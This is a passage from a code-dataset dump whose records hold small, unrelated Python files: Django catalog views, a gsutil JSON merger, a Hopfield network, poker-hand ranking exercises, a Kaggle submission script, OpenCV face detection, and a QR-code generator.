AuthorListView(generic.ListView):\n    \"\"\"Generic class-based list view for a list of authors.\"\"\"\n    model = Author\n    paginate_by = 2\n\n\nclass AuthorDetailView(generic.DetailView):\n    \"\"\"Generic class-based detail view for an author.\"\"\"\n    model = Author\n\n\nclass LoanedBooksAllListView(PermissionRequiredMixin, generic.ListView):\n    \"\"\"Generic class-based view listing all books\n    on loan. 
Only visible to users with can_mark_returned permission.\"\"\"\n model = BookInstance\n permission_required = 'catalog.can_mark_returned'\n template_name = 'catalog/bookinstance_list_borrowed_all.html'\n paginate_by = 2\n\n\nclass AuthorCreate(PermissionRequiredMixin, CreateView):\n model = Author\n fields = '__all__'\n initial = {'date_of_death': '05/01/2018'}\n permission_required = 'catalog.can_mark_returned'\n\n\nclass AuthorUpdate(PermissionRequiredMixin, UpdateView):\n model = Author\n fields = ['first_name', 'last_name', 'date_of_birth', 'date_of_death']\n permission_required = 'catalog.can_mark_returned'\n\n\nclass AuthorDelete(PermissionRequiredMixin, DeleteView):\n model = Author\n success_url = reverse_lazy('authors')\n permission_required = 'catalog.can_mark_returned'\n\n\n# Classes created for the forms challenge\nclass BookCreate(PermissionRequiredMixin, CreateView):\n model = Book\n fields = '__all__'\n permission_required = 'catalog.can_mark_returned'\n\n\nclass BookUpdate(PermissionRequiredMixin, UpdateView):\n model = Book\n fields = '__all__'\n permission_required = 'catalog.can_mark_returned'\n\n\nclass BookDelete(PermissionRequiredMixin, DeleteView):\n model = Book\n success_url = reverse_lazy('books')\n permission_required = 'catalog.can_mark_returned'\n","sub_path":"locallib/catalog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"455646682","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\ncity_by_zip.py: returns the cities listed under a given zipcode\r\n\r\n@author: Jonah\r\n\"\"\"\r\n\r\nfrom uszipcode import SearchEngine\r\n\r\nsearch = SearchEngine(simple_zipcode=False)\r\n\r\ndef return_cities():\r\n zipcode = input(\"Please enter a zipcode: \")\r\n result = search.by_zipcode(zipcode)\r\n for city in result.common_city_list:\r\n print(\"\\n\"+city)\r\n\r\nif __name__ == \"__main__\":\r\n return_cities()\r\n\r\n","sub_path":"city_by_zip.py","file_name":"city_by_zip.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"445482555","text":"#!/usr/bin/env python3\n\nimport argparse\nimport subprocess\nimport shlex\nimport json\nimport os\n\nfrom utils import progressBar,mapcount\n\n\ndef localize_files(gpath,file_list):\n \"\"\"\n Get list of jsons to merge\n \"\"\"\n with open(file_list,'wt') as f:\n if not gpath.endswith('/'): gpath += '/'\n gpath = (f\"{gpath}**/*json\")\n command = f\"gsutil ls {gpath}\"\n print(command)\n subprocess.call(shlex.split(command),stdout = f)\n \ndef merge_files(out_json,file_list):\n \"\"\"\n Localizes each json as tmp file and reads it into memory\n \"\"\"\n tmp_json = os.path.join(os.path.dirname(file_list),'tmp.json')\n json_list = []\n jsons = mapcount(file_list)\n \n with open(file_list) as i:\n for idx,line in enumerate(i):\n progressBar(idx,jsons)\n gfile = line.strip()\n command = f\"gsutil cp {gfile} {tmp_json}\"\n subprocess.call(shlex.split(command),stdout =subprocess.DEVNULL,stderr = subprocess.DEVNULL)\n\n with open(tmp_json) as f: j = json.load(f) \n json_list.append(j)\n\n print('\\ndone.')\n with open(out_json,'wt') as out:\n json.dump(json_list,out,indent = 2)\n\n os.remove(tmp_json)\n os.remove(file_list)\n \ndef run():\n parser = argparse.ArgumentParser(description=\"Merge jsons in one files\")\n parser.add_argument('gpath', type=str, help='Gsutil path ')\n parser.add_argument('out_json', 
type=str, help='Local path of final json')\n    args = parser.parse_args()\n\n    print(args)\n    out_path = os.path.dirname(args.out_json)\n    file_list = os.path.join(out_path, 'json_list.txt')\n    localize_files(args.gpath, file_list)\n    merge_files(args.out_json, file_list)\n\n    \nif __name__ == \"__main__\":\n\n    run()\n","sub_path":"scripts/merge_jsons.py","file_name":"merge_jsons.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"603887447","text":"import numpy as np\r\nimport random\r\nimport math\r\n\r\n# Hebbian learning rule\r\ndef hebbLearn(patterns):\r\n    length = patterns.shape[1]\r\n    weights = np.zeros((length, length))\r\n    for pattern in patterns:\r\n        for i in range(0, length - 1):\r\n            for j in range(i + 1, length):\r\n                weights[i][j] += pattern[i] * pattern[j]\r\n    for i in range(0, length - 1):\r\n        for j in range(i + 1, length):\r\n            weights[i][j] /= length\r\n            weights[j][i] = weights[i][j]\r\n    return weights\r\n\r\n# Sign threshold for unit updates (this helper was missing from the original file; the standard Hopfield sign update is assumed)\r\ndef threshold(a):\r\n    return 1 if a >= 0 else -1\r\n\r\n# Recall a pattern using the learned weights\r\ndef associate(input_state, weights, iterateNum):\r\n    length = len(input_state)\r\n    state = input_state.copy()\r\n    for i in range(0, iterateNum):\r\n        index = random.randint(0, length - 1)\r\n        a = sum([weights[index][i] * state[i] for i in range(0, length)])\r\n        state[index] = threshold(a)\r\n    return state\r\n\r\n# Convert an n^2-dimensional vector into an n*n matrix for visualization\r\ndef deserialize(data):\r\n    size = round(math.sqrt(len(data)))\r\n    matrix = np.zeros((size, size), dtype=int)\r\n    for i in range(0, size):\r\n        matrix[i] = data[size * i : size * (i + 1)]\r\n    return matrix\r\n\r\n# Distance between two data vectors\r\ndef distance(data1, data2):\r\n    return sum([abs(data1[i] - data2[i]) for i in range(0, len(data1))]) / 2\r\n","sub_path":"hopfield/jupyter_notebook/.ipynb_checkpoints/HopfieldNetWorks.py","file_name":"HopfieldNetWorks.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"138949808","text":"# -----------\n# User Instructions\n#\n# Modify the hand_rank function so that it returns the\n# correct output for the remaining hand types, which are:\n# full house, flush, straight, three of a kind, two pair,\n# pair, and high card hands.\n#\n# Do this by completing each return statement below.\n#\n# You may assume the following behavior of each function:\n#\n# straight(ranks): returns True if the hand is a straight.\n# flush(hand):    returns True if the hand is a flush.\n# kind(n, ranks): returns the first rank that the hand has\n#                 exactly n of. For a hand with 4 sevens\n#                 this function would return 7.\n# two_pair(ranks): if there is a two pair, this function\n#                 returns their corresponding ranks as a\n#                 tuple. For example, a hand with 2 twos\n#                 and 2 fours would cause this function\n#                 to return (4, 2).\n# card_ranks(hand) returns an ORDERED tuple of the ranks\n#                 in a hand (where the order goes from\n#                 highest to lowest rank).\n#\n# Since we are assuming that some functions are already\n# written, this code will not RUN. 
Clicking SUBMIT will\n# tell you if you are correct.\n\n# Lesson1 - chapter 16\n# -----------\n# User Instructions\n#\n# Modify the test() function to include three new test cases.\n# These should assert that card_ranks gives the appropriate\n# output for the given straight flush, four of a kind, and\n# full house.\n#\n# For example, calling card_ranks on sf should output\n# [10, 9, 8, 7, 6]\n#\n# Since the program is still incomplete, clicking RUN won't do\n# anything, but clicking SUBMIT will let you know if you\n# have gotten the problem right.\n\n# Lesson1 - chapter 16\n# Modify the card_ranks() function so that cards with\n# rank of ten, jack, queen, king, or ace (T, J, Q, K, A)\n# are handled correctly. Do this by mapping 'T' to 10,\n# 'J' to 11, etc...\n\n# my solution\n\n\nimport random  # this will be a useful library for shuffling\n\n\ndef poker(hands):\n    \"Return the best hand: poker([hand,...]) => hand\"\n    return allmax(hands, k=hand_rank_better)  # hand_rank_better is defined below\n\n\ndef allmax(iterable, k=None):\n    \"Return a list of all items equal to the max of the iterable.\"\n    k = k or (lambda x: x)\n    return [i for i in iterable if k(i) == k(max(iterable, key=k))]\n\n\ndef hand_rank_old(hand):\n    ranks = card_ranks(hand)\n    if straight(ranks) and flush(hand):  # straight flush\n        return (8, max(ranks))\n    elif kind(4, ranks):  # 4 of a kind\n        return (7, kind(4, ranks), kind(1, ranks))\n    elif kind(3, ranks) and kind(2, ranks):  # full house\n        return (6, kind(3, ranks), kind(2, ranks))\n    elif flush(hand):  # flush\n        return (5, ranks)\n    elif straight(ranks):  # straight\n        return (4, max(ranks))\n    elif kind(3, ranks):  # 3 of a kind\n        return (3, kind(3, ranks), ranks)\n    elif two_pair(ranks):  # 2 pair\n        return (2, two_pair(ranks), ranks)\n    elif kind(2, ranks):  # kind\n        return (1, kind(2, ranks), ranks)\n    else:  # high card\n        return (0, ranks)\n\n# %% new hand_rank\n\n\ndef hand_rank_better(hand):\n    \" counts is the count of each rank; ranks lists corresponding ranks\"\n    # counts is the count of each rank; ranks lists corresponding card_ranks\n    # '7 T 7 9 7' --> counts = (3,1,1); ranks = (7, 10 , 9)\n    groups = group(['--23456789TJQKA'.index(r) for r, s in hand])\n    counts, ranks = unzip(groups)\n    if ranks == (14, 5, 4, 3, 2):\n        ranks = (5, 4, 3, 2, 1)\n    straight = len(ranks) == 5 and max(ranks) - min(ranks) == 4\n    flush = len(set([s for r, s in hand])) == 1\n    return (9 if (5,) == counts else\n            8 if straight and flush else\n            7 if (4, 1) == counts else\n            6 if (3, 2) == counts else\n            5 if flush else\n            4 if straight else\n            3 if (3, 1, 1) == counts else\n            2 if (2, 2, 1) == counts else\n            1 if (2, 1, 1, 1) == counts else\n            0), ranks\n\n\ndef unzip(pairs): return zip(*pairs)\n\n\ndef group(ranks):\n    groups = [(ranks.count(x), x) for x in set(ranks)]\n    return sorted(groups, reverse=True)\n\n\n# Second pass at hand_rank_better: same grouping, but it scores via the\n# count_rankings lookup table below (this definition supersedes the one above).\ndef hand_rank_better(hand):\n    \" counts is the count of each rank; ranks lists corresponding ranks\"\n    # counts is the count of each rank; ranks lists corresponding card_ranks\n    # '7 T 7 9 7' --> counts = (3,1,1); ranks = (7, 10 , 9)\n    groups = group(['--23456789TJQKA'.index(r) for r, s in hand])\n    counts, ranks = unzip(groups)\n    if ranks == (14, 5, 4, 3, 2):\n        ranks = (5, 4, 3, 2, 1)\n    straight = len(ranks) == 5 and max(ranks) - min(ranks) == 4\n    flush = len(set([s for r, s in hand])) == 1\n    return max(count_rankings[counts], 4 * straight + 5 * flush), ranks\n\n\ncount_rankings = {(5,): 10, (4, 1): 7, (3, 2): 6, (3, 1, 1): 3,\n                  (2, 2, 1): 2, (2, 1, 1, 1): 1, (1, 1, 1, 1, 1): 0}\n# %%\n# Luka version\n\n\ndef card_ranks_ls(cards):\n    \"Return a list of the ranks, sorted with higher 
first.\"\n    ranks = [r for r, s in cards]\n    change_ranks = {\"T\": 10, \"J\": 11, \"Q\": 12, \"K\": 13, \"A\": 14}\n    # map face cards via the dict and convert digit characters to ints so the sort works in Python 3\n    ranks = [change_ranks[i] if i in change_ranks else int(i) for i in ranks]\n    ranks.sort(reverse=True)\n    return ranks\n\n\n# official\ndef card_ranks_ace_wrong(cards):\n    \"Return a list of the ranks, sorted with higher first.\"\n    ranks = ['--23456789TJQKA'.index(r) for r, s in cards]\n    ranks.sort(reverse=True)\n    return ranks\n\n# %%\n# Lesson1_18\n# User Instructions\n#\n# Define two functions, straight(ranks) and flush(hand).\n# Keep in mind that ranks will be ordered from largest\n# to smallest.\n\n# luka\n\n\ndef straight_ls(ranks):\n    \"Return True if the ordered ranks form a 5-card straight.\"\n    for i in range(len(ranks) - 1):\n        if ranks[i] - 1 != ranks[i + 1]:\n            return False\n    return True\n\n\ndef flush_ls(hand):\n    \"Return True if all the cards have the same suit.\"\n    for i in range(len(hand) - 1):\n        if hand[i][1] != hand[i + 1][1]:\n            return False\n    return True\n\n# official\n\n\ndef straight(ranks):\n    \"Return True if the ordered ranks form a 5-card straight.\"\n    return (max(ranks) - min(ranks) == 4) and len(set(ranks)) == 5\n\n\ndef flush(hand):\n    \"Return True if all the cards have the same suit.\"\n    suits = [s for r, s in hand]\n    return len(set(suits)) == 1\n\n\n# %%\n# Lesson1_19\n# User Instructions\n#\n# Define a function, kind(n, ranks).\n\ndef kind_ls(n, ranks):\n    \"\"\"Return the first rank that this hand has exactly n of.\n    Return None if there is no n-of-a-kind in the hand.\"\"\"\n    for _ in sorted(set(ranks), reverse=True):\n        if ranks.count(_) == n:\n            return _\n    return None\n\n# official\n\n\ndef kind(n, ranks):\n    \"\"\"Return the first rank that this hand has exactly n of.\n    Return None if there is no n-of-a-kind in the hand.\"\"\"\n    for r in ranks:\n        if ranks.count(r) == n:\n            return r\n    return None\n\n# Lesson1_20\n# User Instructions\n#\n# Define a function, two_pair_ls(ranks).\n\n\ndef two_pair_ls(ranks):\n    \"\"\"If there are two pair, return the two ranks as a\n    tuple: (highest, lowest); otherwise return None.\"\"\"\n    uniqueRanks = sorted(set(ranks), reverse=True)\n    if len(uniqueRanks) != 3 or ranks.count(uniqueRanks[0]) == 3 or ranks.count(uniqueRanks[1]) == 3 or ranks.count(uniqueRanks[2]) == 3:\n        return None\n\n    if ranks.count(uniqueRanks[0]) != 2:\n        return (uniqueRanks[1], uniqueRanks[2])\n    elif ranks.count(uniqueRanks[1]) != 2:\n        return (uniqueRanks[0], uniqueRanks[2])\n    else:\n        return (uniqueRanks[0], uniqueRanks[1])\n\n\n# A simpler version built on kind(); this definition supersedes the one above.\ndef two_pair_ls(ranks):\n    \"\"\"If there are two pair, return the two ranks as a\n    tuple: (highest, lowest); otherwise return None.\"\"\"\n    pair = kind(2, ranks)\n    lowpair = kind(2, list(reversed(ranks)))\n    if pair and lowpair != pair:\n        return (pair, lowpair)\n    else:\n        return None\n\n# %% lesson1_23 block\n# official\n# Lesson1_23\n# User Instructions\n#\n# Modify the card_ranks(hand) function so that a\n# straight with a low ace (A, 2, 3, 4, 5) will be\n# properly identified as a straight by the\n# straight() function.\n\n\ndef card_ranks_ls_ace_fix(cards):\n    \"Return a list of the ranks, sorted with higher first.\"\n    ranks = ['--23456789TJQKA'.index(r) for r, s in cards]\n    if (max(ranks) - min(ranks) == 12) and len(set(ranks)) == 5 and (ranks.count(14) == 1):\n        ranks.remove(14)\n        ranks.append(1)\n    ranks.sort(reverse=True)\n\n    return ranks\n\n# official solution ace fix\n\n\ndef card_ranks(cards):\n    \"Return a list of the ranks, sorted with higher first.\"\n    ranks = ['--23456789TJQKA'.index(r) for r, s in cards]\n    
ranks.sort(reverse=True)\n\n return [5, 4, 3, 2, 1] if (ranks == [14, 5, 4, 3, 2]) else ranks\n\n\n# al = \"AC 2D 4H 3D 5S\".split() # Ace-Low Straight\n# print(f'kraj: {straight(card_ranks(al))}')\n\n\n# %% lesson1_26 Deal\n# -----------\n# User Instructions\n#\n# Write a function, deal(numhands, n=5, deck), that\n# deals numhands hands with n cards each.\n#\n\n\n# This builds a deck of 52 cards. If you are unfamiliar\n# with this notation, check out Andy's supplemental video\n# on list comprehensions (you can find the link in the\n# Instructor Comments box below).\n\nmydeck = [r + s for r in '23456789TJQKA' for s in 'SHDC']\n\n\ndef deal(numhands, n=5, deck=mydeck):\n \"shuffle the deck and deal out numhands n-card hands.\"\n random.shuffle(deck)\n return [deck[n * i:n * (i + 1)] for i in range(numhands)]\n# %% test block\n\n\ndef test():\n \"Test cases for the functions in poker program.\"\n sf = \"6C 7C 8C 9C TC\".split() # Straight Flush\n fk = \"9D 9H 9S 9C 7D\".split() # Four of a Kind\n fh = \"TD TC TH 7C 7D\".split() # Full House\n tp = \"TD 9H TH 7C 3S\".split() # Two Pair\n fkranks = card_ranks(fk)\n tpranks = card_ranks(tp)\n assert kind(4, fkranks) == 9\n assert kind(3, fkranks) == None\n assert kind(2, fkranks) == None\n assert kind(1, fkranks) == 7\n return 'tests pass'\n\n\nprint(test())\n","sub_path":"Lesson1_poker.py","file_name":"Lesson1_poker.py","file_ext":"py","file_size_in_byte":10046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"302254128","text":"import sys\n\nimport pandas as pd\nimport numpy as np\n\nfrom utils import print_step, rmse\n\nprint_step('Load train')\ntrain = pd.read_csv('processed_train.csv')\n\nprint_step('Load test')\ntest = pd.read_csv('processed_test.csv')\n\nprint_step('Gathering')\nIS_OOFS_MODE = len(sys.argv) == 2 and sys.argv[1] == 'add_oofs'\noof_data = {}\noof_g_data = {}\nsubmit_data = {}\nsubmit_g_data = {}\ntargets = ['TotalTimeStopped_p20', 'TotalTimeStopped_p40',\n 'TotalTimeStopped_p50', 'TotalTimeStopped_p60', 'TotalTimeStopped_p80',\n 'TimeFromFirstStop_p20', 'TimeFromFirstStop_p40',\n 'TimeFromFirstStop_p50', 'TimeFromFirstStop_p60',\n 'TimeFromFirstStop_p80', 'DistanceToFirstStop_p20',\n 'DistanceToFirstStop_p40', 'DistanceToFirstStop_p50',\n 'DistanceToFirstStop_p60', 'DistanceToFirstStop_p80']\nif IS_OOFS_MODE:\n print_step('[Adding lvl 1 OOF data]')\nfor target in targets:\n if 'TimeFromFirstStop' not in target and '40' not in target and '60' not in target: # These targets don't count\n label = target\n if IS_OOFS_MODE:\n label = label + '_w_oofs'\n oof_data[target] = pd.read_csv('{}_oof.csv'.format(label))\n oof_g_data[target] = pd.read_csv('{}_g_oof.csv'.format(label))\n submit_data[target] = pd.read_csv('{}_submit.csv'.format(label))\n submit_g_data[target] = pd.read_csv('{}_g_submit.csv'.format(label))\n\n\nprint_step('Compiling OOFs')\noofs = pd.concat(oof_data.values(), axis=1).reset_index(drop=True)\noofs_g = pd.concat(oof_g_data.values(), axis=1).reset_index(drop=True)\noofs_g.columns = [c + '_g' for c in oofs_g.columns]\n\nrmses_ = []\nfor target in oof_data.keys():\n label = target\n if IS_OOFS_MODE:\n label = label + '_w_oofs'\n oof_data[target]['target'] = train[target]\n rmse_ = rmse(oof_data[target]['target'], oof_data[target][label])\n print(target, rmse_)\n rmses_.append(rmse_)\nrmse_mean = np.mean(rmses_)\nprint('Mean', rmse_mean)\n\noofs3 = pd.concat([pd.DataFrame(x.values) for x in oof_data.values()], axis=0)\noofs3.columns = ['value', 
'target']\n\nglobal_mean = rmse(oofs3['target'], oofs3['value'])\nprint('Global', global_mean)\n\nrmses_ = []\nfor target in oof_data.keys():\n    label = target\n    if IS_OOFS_MODE:\n        label = label + '_w_oofs'\n    oof_g_data[target]['target'] = train[target]\n    rmse_ = rmse(oof_g_data[target]['target'], oof_g_data[target][label])\n    print(target, rmse_)\n    rmses_.append(rmse_)\ngroup_mean = np.mean(rmses_)\nprint('Group Mean', group_mean)\noofs3_g = pd.concat([pd.DataFrame(x.values) for x in oof_g_data.values()], axis=0)\noofs3_g.columns = ['value', 'target']\nglobal_mean2 = rmse(oofs3_g['target'], oofs3_g['value'])\nprint('Global2', global_mean2)\nprint('Projected LB', (global_mean / rmse_mean) * group_mean)\n\n# import pdb\n# pdb.set_trace()  # debug breakpoint disabled so the script can run unattended\n\nprint_step('Compiling Submit M')\nin_only = set(test['IntersectionId']) - set(train['IntersectionId'])\ntest['IntersectionIdIn'] = test['IntersectionId'].apply(lambda x: x in in_only)\n\nsubmit = pd.concat(submit_data.values(), axis=1).reset_index(drop=True)\nsubmit_g = pd.concat(submit_g_data.values(), axis=1).reset_index(drop=True)\nfor target in oof_data.keys():\n    label = target\n    if IS_OOFS_MODE:\n        label = label + '_w_oofs'\n    test.loc[test['IntersectionIdIn'], target] = submit_g[test['IntersectionIdIn']][label]\n    test.loc[~test['IntersectionIdIn'], target] = submit[~test['IntersectionIdIn']][label]\n    submit_data[target] = test[target]\n\nsubmit3 = pd.concat([pd.DataFrame(x.values) for x in submit_data.values()], axis=0)\nsubmit3.columns = ['Target']\nsubmit3 = submit3.reset_index(drop=True)\nsubmit3['TargetId'] = sum([['{}_{}'.format(d, c) for d in range(submit_data['TotalTimeStopped_p20'].shape[0])] for c in range(6)], [])\nsubmit3 = submit3.sort_values('TargetId').reset_index(drop=True)[['TargetId', 'Target']]\n\nprint_step('Saving Submit M')\nsubmit3.to_csv('submission_m.csv', index=False)\n\nif not IS_OOFS_MODE:\n    print_step('Saving OOFs (train) 1/2')\n    oofs.to_csv('oofs_train.csv', index=False)\n    print_step('Saving OOFs (train) 2/2')\n    oofs_g.to_csv('oofs_g_train.csv', index=False)\n\n    print_step('Saving OOFs (test) 1/2')\n    submit.to_csv('oofs_test.csv', index=False)\n    print_step('Saving OOFs (test) 2/2')\n    submit_g.columns = [c + '_g' for c in submit_g.columns]\n    submit_g.to_csv('oofs_g_test.csv', index=False)\n","sub_path":"submit.py","file_name":"submit.py","file_ext":"py","file_size_in_byte":4409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"147561664","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*- \n\nimport tornado.ioloop\nimport tornado.web\n\nclass MainHandler(tornado.web.RequestHandler):\n    def get(self):\n        i = self.get_argument('i', 'hello')\n        self.write(i + \", welcome to f911's website: www.fatework.com\")\n\n\ndef make_app():\n    return tornado.web.Application([\n        (r\"/\", MainHandler),\n    ])\n\n\nif __name__ == \"__main__\":\n    app = make_app()\n    app.listen(8888)\n    tornado.ioloop.IOLoop.current().start()\n\n\n# vim:nocp:ai:si:ci:et:ts=4:sts=4:sw=4:ft=python:ff=unix:fenc=utf-8:\n# EOF\n","sub_path":"python/qiwsir/08-tornado/say_hello_tornado.py","file_name":"say_hello_tornado.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"96769495","text":"\r\n\r\nclass Config:\r\n    def __init__(self):\r\n        self.lr = 1e-5\r\n        self.batch_size = 30\r\n        self.num_instances = 5\r\n        self.dim = 512\r\n        self.width = 224\r\n        self.origin_width = 256\r\n        self.ratio 
= 0.16\r\n        self.alpha = 2\r\n        self.beta = 50\r\n        self.k = 16\r\n        self.margin = 0.5\r\n        self.log_name = 'VGG16_V5'\r\n        self.init = 'random'\r\n        self.freeze_BN = True\r\n        self.data = 'cub'\r\n        self.data_root = ''\r\n        self.net = 'VGG16_V5'\r\n        self.epochs = 1000\r\n        self.save_step = 30\r\n        self.resume = None  # pretrained model path\r\n        self.print_freq = 5  # show loss\r\n        self.save_dir = 'saved_model'  # model_save dir\r\n        self.nThreads = 8\r\n        self.momentum = 0.9\r\n        self.weight_decay = 5e-4\r\n        self.loss_base = 0.75\r\n        self.loss = 'Binomial'\r\n        self.use_reg = False\r\n        self.pool_feature = False\r\n        self.gallery_eq_query = True\r\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"409415353","text":"#!/usr/bin/python3\n'''Simple face detection demo of OpenCV3 under Python 3'''\n\nimport cv2\nimport sys\nimport numpy as np\nfrom PIL import Image\n\n## training\ncascPath = './training_data/haarcascade_frontalface_default.xml'\nfaceCascade = cv2.CascadeClassifier(cascPath)\n\ncv2.namedWindow('faces', cv2.WINDOW_NORMAL)\n\n## read frame\nimg = cv2.imread(sys.argv[1])\n\n## face detection\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\nfaces = faceCascade.detectMultiScale(\n    gray,\n    scaleFactor=1.1,\n    minNeighbors=5,\n    minSize=(30,30),\n    flags=cv2.CASCADE_SCALE_IMAGE\n)\n \n## put rectangle box over detected face\nfor (x, y, w, h) in faces:\n    cv2.rectangle(img, (x,y),(x+w,y+h), (0,255,0),2)\n    \ncv2.imshow('faces', img)\n\ncv2.waitKey()\ncv2.destroyAllWindows()\n","sub_path":"object_detection/face_detection_by_pic.py","file_name":"face_detection_by_pic.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"86428796","text":"#!/usr/bin/env python\n# coding: utf-8\n\"\"\"\n# file : 文件读写.py\n# author : shao\n# date: 2017/10/28 0028\n\"\"\"\nimport csv\n\nimport pandas as pd\nfrom pylab import *\n\n# Use a font that can display Chinese characters\nmpl.rcParams[\"font.sans-serif\"]=['SimHei']\n\n\ndef read_data(file='./relays.csv'):\n\t# Collect the rows of the file into a list, then return it\n\tdata_dict=[]\n\treader=csv.DictReader(open(file))\n\tfor row in reader:\n\t\tname=row['Name']\n\t\tfingerprint=row['Fingerprint']\n\t\tflags=row['Flags']\n\t\tip=row['IP']\n\t\torport=row['OrPort']\n\t\tobservedBW=row['ObservedBW']\n\t\tuptime=row['Uptime']\n\t\tguardclients=row['GuardClients']\n\t\tdirclients=row['DirClients']\n\t\tlongitude=row['Longitude']\n\t\tlatitude=row.get('Latitude','')\n\t\t\n\t\trowinfo=[str(name),str(fingerprint),str(flags),\n\t\t\t\t str(ip),str(orport),str(observedBW),str(uptime),\n\t\t\t\t str(guardclients),str(dirclients),str(longitude),\n\t\t\t\t str(latitude)]\n\t\t#\n\t\t\n\t\t# Print the corresponding fields\n\t\t# print(rowinformation)\n\t\tdata_dict.append(rowinfo)\n\treturn data_dict\n\n\ndef write_data(source,file):\n\twith open(file,'w',newline='') as csvfile:\n\t\theader=['Name','Fingerprint','Flags','IP','OrPort',\n\t\t\t\t'ObservedBW','Uptime','GuardClient','DirClient',\n\t\t\t\t'Longitude','Latitude']\n\t\t# file_writer=csv.DictWriter(csvfile,fieldnames=header)\n\t\tfile_writer=csv.writer(csvfile,dialect='excel')\n\t\t# Write the header row to the CSV file first, then write the data rows\n\t\tfile_writer.writerow(header)\n\t\tfor line in source:\n\t\t\t# print(line)\n\t\t\tfile_writer.writerow(line)\n\n\n# Perform the data analysis\ndef data_analysis(filename):\n\t\"\"\"\n:param filename: str, path to the CSV file\n:return: 
void\n\"\"\"\n\tfieldsname=['Name','Fingerprint','Flags','IP','OrPort',\n\t\t\t\t'ObservedBW','Uptime','GuardClient','DirClient',\n\t\t\t\t'Longitude','Latitude']\n\tdata=pd.read_csv(filename,sep=',')\n\t# print(data[:2])\n\t# Group by the Flags column and show the top 100 Flags entries\n\tflags_by_ratings=data.groupby('Flags').size()\n\tprint(\"Top 100 Flags entries:\")\n\tprint(flags_by_ratings[:100])\n\t\n\t# Draw a histogram\n\txlabel_flags=[\"M\",\"ME\",\"MEH\",\"MG\",\"MGE\",\"MGEH\",\"MGH\",\"MH\"]\n\tylabel_flags=list(flags_by_ratings.iloc[:])\n\t\n\t#\n\t# Line chart: figure 1\n\t# print(xlabel_flags,ylabel_flags)\n\t# plt.plot(range(len(xlabel_flags)), ylabel_flags)\n\t# # show the x-axis numbers as text labels\n\t# plt.xticks(range(len(xlabel_flags)), xlabel_flags)\n\t# plt.xlabel(u'Flags category')\n\t# plt.ylabel(u'Count')\n\t# plt.title(\"Flags distribution\")\n\t# plt.show()\n\t\n\t# Bar chart: figure 2\n\txbar=np.arange(len(xlabel_flags))\n\tybar=ylabel_flags\n\tplt.bar(xbar,ybar,facecolor=\"#ee3300\",edgecolor=\"white\")\n\tplt.xticks(range(len(xlabel_flags)),xlabel_flags)\n\t\n\t# Add data labels above each bar\n\tfor x,y in zip(xbar,ybar):\n\t\tplt.text(x,y,'%d'%y,ha=\"center\",va=\"bottom\")\n\t\n\tplt.xlabel(u'Flags category')\n\tplt.ylabel(u'Count')\n\tplt.title(\"Flags distribution\")\n\tplt.show()\n\t\n\t# Show everything in one figure\n\t\n\tprint(\"------------------------------------\")\n\tactive_flags=flags_by_ratings.index[flags_by_ratings>=50]\n\tprint(\"Flags entries that occur at least 50 times:\")\n\t# print(active_flags)\n\t\n\tprint('------------------------------------')\n\tprint('Distribution of observed bandwidth per interval:')\n\tdata_groupbyBW=data.groupby('ObservedBW').size()\n\t# print(data_groupbyBW)\n\t\n\tprint('-------------------------------------')\n\tprint('Number of nodes per OrPort:')\n\t\n\tprint('-------------------------------------')\n\tprint('Country information for each IP')\n\t\n\tprint('-------------------------------------')\n\tprint('Summary statistics:')\n\tprint(data.describe())\n\t\n\t# Run a classification algorithm\n\n\nif __name__ == '__main__':\n\t# Read the data from the CSV file\n\t# data_dict = read_data()\n\t# print(data_dict)\n\t# write_data(source=data_dict, file='./data.csv')\n\tdata_analysis('./data.csv')\n","sub_path":"basic/csv文件读写.py","file_name":"csv文件读写.py","file_ext":"py","file_size_in_byte":3730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"295048688","text":"import shutil\nimport Tamanho as tam\n\nfrom pathlib import Path\n\n# Create the images folder\ncaminho = './imagens'\nPath(caminho).mkdir(exist_ok=True)\n\n# Input\nlink = input('Your link: ')\nnome = input('QR code name: ')\n\n# Set the QR code size\nqr = tam.EscolhaTamanho()\n\n# Processing\nqr.add_data(link)\nqr.make(fit=True)\nlink = qr.make_image(fill_color=\"black\", back_color=\"white\")\n\n# Output: save the QR code and move it into the \"imagens\" folder\nlink.save(f'{nome}.png')\n\nsource = f'./{nome}.png'\nshutil.move(source, caminho)\n\nprint(f'\\nThe image was generated at: {caminho}/{nome}.png !')","sub_path":"Program.py","file_name":"Program.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"403157282","text":"def trials(N = 1000, n = 100):\n    \"\"\" \n    N = how many trials to run\n    n = how many times to run sim() per trial\n    will collect all the data into a dictionary of lists\n    \"\"\"\n    data = {}\n    trial = [0 for i in range(n+1)]\n    test_wins = 0\n    \n    for test in range(N):\n        test_wins = sim(n = n)\n        trial[test_wins] += 1\n    \n    data[(0,0)] = trial\n    \n    for die1 in range (1,7):\n        \n        for die2 in range (die1, 7):\n            trial = [0 for i in range(n+1)]\n            \n            for test in range(N):\n                
